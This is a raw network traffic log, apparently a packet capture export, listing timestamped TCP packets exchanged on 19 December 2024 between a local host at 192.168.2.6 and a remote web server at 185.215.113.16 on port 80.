Dec 19, 2024 10:10:21.735426903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.735428095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.735991955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.736219883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.736269951 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.736356974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.736407042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.737139940 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.737190008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.737236023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.737286091 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.737989902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.738044977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.738156080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.738207102 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.739085913 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.739139080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.739214897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.739270926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.740036011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.740086079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.740149021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.740200043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.740883112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.740930080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.740982056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.741031885 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.741652012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.741883993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.741936922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.742449999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.742506027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.742587090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.743247986 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.743382931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.743444920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.744139910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.744265079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.744323969 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.744935036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.745057106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.745106936 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.745968103 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.746016026 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.746078014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.746752024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.746803999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.746805906 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.747688055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.747725964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.747740984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.747980118 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.748464108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.748594999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.748646975 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.749305010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.749430895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.749485970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.750175953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.750226974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.750288010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.750787973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.750839949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.750844002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.751553059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.751605034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.751676083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.751727104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.752460957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.752600908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.752648115 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.753329039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.753453970 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.753503084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.754277945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.754419088 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.754471064 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.755369902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.755472898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.755526066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.756191015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.756241083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.756311893 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.756972075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.757055998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.757113934 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.757158995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.757209063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.757846117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.757894993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.757941008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.757991076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.758677959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.758727074 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.758795023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.758846045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.759627104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.759677887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.759808064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.759856939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.760493040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.760735989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.760791063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.761339903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.761477947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.761532068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.762568951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.762725115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.762778997 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.763542891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.763595104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.763748884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.764564037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.764616013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.764751911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.765371084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.765423059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.765451908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.765502930 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.766427040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.766693115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.766745090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.767486095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.767949104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.768003941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.768506050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.768541098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.768559933 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.768589020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.915150881 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.915215969 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.915241957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.915292978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.915513039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.915582895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.915718079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.915771008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.916249990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.916305065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.916619062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.916672945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.916951895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.917006016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.917066097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.917126894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.917587042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.917640924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.917823076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.917879105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.918287992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.918344021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.918354988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.918392897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.918967009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.919034004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.919045925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.919091940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.919864893 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.919919968 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.920000076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.920062065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.920779943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.920892000 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.921569109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.921622038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.921686888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.921722889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.921736956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.921768904 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.922540903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.922595978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.922736883 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.922818899 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.923464060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.923964024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.923985004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.924009085 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.924397945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.924451113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.924500942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.925165892 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.925220013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.925235033 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.926211119 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.926270008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.926554918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.926606894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.927062988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.927251101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.927306890 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.927982092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.928018093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.928082943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.928972006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.929028034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.929722071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.929759026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.929805994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.929867983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.929919958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.930500031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.930553913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.930717945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.930778027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.931412935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.931471109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.931548119 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.931616068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.932353020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.932409048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.933132887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.933192015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.933233976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.933269024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.933291912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.933387041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.934088945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.934143066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.935065031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.935100079 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.935117006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.935136080 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.935156107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.935182095 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.935997963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.936048985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.936089993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.936141014 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.936806917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.936866999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.936927080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.937679052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.937731028 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.938123941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.938182116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.938556910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.938627958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.939420938 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.939488888 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.939548016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.939584017 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.939599991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.939634085 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.940412998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.940466881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.940830946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.940879107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.941400051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.941462040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.941689968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.941741943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.942219973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.942255020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.942274094 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.942303896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.943006039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.943058968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.943114996 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.943880081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.944072962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.944180965 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.944233894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.944763899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.944818020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.945152044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.945208073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.945597887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.945652962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.945715904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.945763111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.946660042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.946727037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.947072029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.947124958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.947494984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.947580099 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.947655916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.947705984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.948473930 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.948555946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.948710918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.948782921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.949318886 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.949441910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.949479103 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.949562073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.950100899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.950156927 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.950437069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.950494051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.951006889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.951062918 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.951154947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.951200962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.951864004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.951961994 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.952018976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.952780008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.952837944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.953315973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.953363895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.953702927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.953777075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.953896999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.954046011 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.954539061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.954586983 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.955029011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.955106020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.955499887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.955548048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.955626011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.955693960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.956348896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.956430912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.956439972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.956496954 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.957529068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.957587957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.957938910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.958076954 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.958688021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.958738089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.959158897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.959209919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.959767103 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.959819078 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.959969044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.960032940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.960392952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.960445881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.960551977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.960608006 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:21.961020947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:21.961069107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.107001066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.107029915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.107170105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.107170105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.107371092 CET	80	49881	185.215.113.16	192.168.2.6
